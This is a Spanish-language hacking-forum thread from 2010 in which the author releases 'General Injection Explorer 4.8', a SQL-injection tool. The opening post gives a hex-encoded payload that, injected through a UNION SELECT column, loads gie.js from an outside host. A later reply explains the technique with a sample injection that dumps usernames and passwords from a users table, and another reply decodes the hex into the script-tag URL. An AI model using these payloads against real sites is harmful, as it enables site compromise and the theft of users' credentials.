elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  GiE 4.8 - SQLi
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: GiE 4.8 - SQLi  (Leído 6,591 veces)
Pony-Magic

Desconectado Desconectado

Mensajes: 36



Ver Perfil
GiE 4.8 - SQLi
« en: 13 Diciembre 2010, 09:26 am »

General Injection Explorer 4.8
version anterior.

  • ajax peticiones con async
  • dumpea tablas en <table> y .SQL
  • full path disclosure
  • write file


Código:
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))

-> usar ((0xCode)) en vez de (0xCode)



@name: General Injection Explorer
@version: 4.8
@author: PonyMagic
@date: 12/12/2010 - 2:51
@contact: PonyMagic@live.com


PD: si ni sabes como funciona, abajo del titulo podes ver el post de la versión anterior.[/b]
En línea

Darioxhcx


Desconectado Desconectado

Mensajes: 2.294


Ver Perfil
Re: GiE 4.8 - SQLi
« Respuesta #1 en: 13 Diciembre 2010, 17:31 pm »

saaaaabeeeeeeeeeeeeeeeeeeeeee
En línea

Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: GiE 4.8 - SQLi
« Respuesta #2 en: 17 Diciembre 2010, 11:23 am »

Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
Código:
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?
En línea

Pony-Magic

Desconectado Desconectado

Mensajes: 36



Ver Perfil
Re: GiE 4.8 - SQLi
« Respuesta #3 en: 17 Diciembre 2010, 12:52 pm »

Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
Código:
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?


cuando unes el select en la inyección, marcas la cantidad de columnas y en una que se muestre ingresas todo ese codigo.
es un tag <script> que llama a gie.js en hexadecimal (para poder imprimirlo) y los (()) son para "dividir" la url desde el código javascript.
Luego, mediante peticiones ajax, se inyecta entre los (()) algo como esto:

.php?id=12 and 0 union all select 1,2,(( select concat(user,pass) from users limit 4,1 )),4--

En realidad, mirando el código de fuente, se puede ver que las inyecciones son un tanto mas complejas. Pero básicamente es eso.

En línea

xassiz~


Desconectado Desconectado

Mensajes: 457



Ver Perfil WWW
Re: GiE 4.8 - SQLi
« Respuesta #4 en: 17 Diciembre 2010, 14:37 pm »

Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
Código:
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?
Código
  1. <script src='http://kryptosecurity.com.ar/gie.js'/>
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problema con SQLI Helper
Hacking
Nardo[N] 5 5,797 Último mensaje 24 Febrero 2011, 04:32 am
por Nardo[N]
Prevención de SQLi
Nivel Web
Castg! 2 4,959 Último mensaje 22 Febrero 2011, 00:14 am
por Castg!
5013 webs vulnerables a sqli
Nivel Web
Tyrz 0 6,886 Último mensaje 12 Abril 2011, 10:01 am
por Tyrz
Ayuda con SQLi
Bugs y Exploits
W0LFeR 1 3,047 Último mensaje 16 Mayo 2012, 13:52 pm
por jackgris
SQLi Ayuda
Bugs y Exploits
lCookiesPass 1 3,583 Último mensaje 13 Noviembre 2012, 21:15 pm
por ameise_1987
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines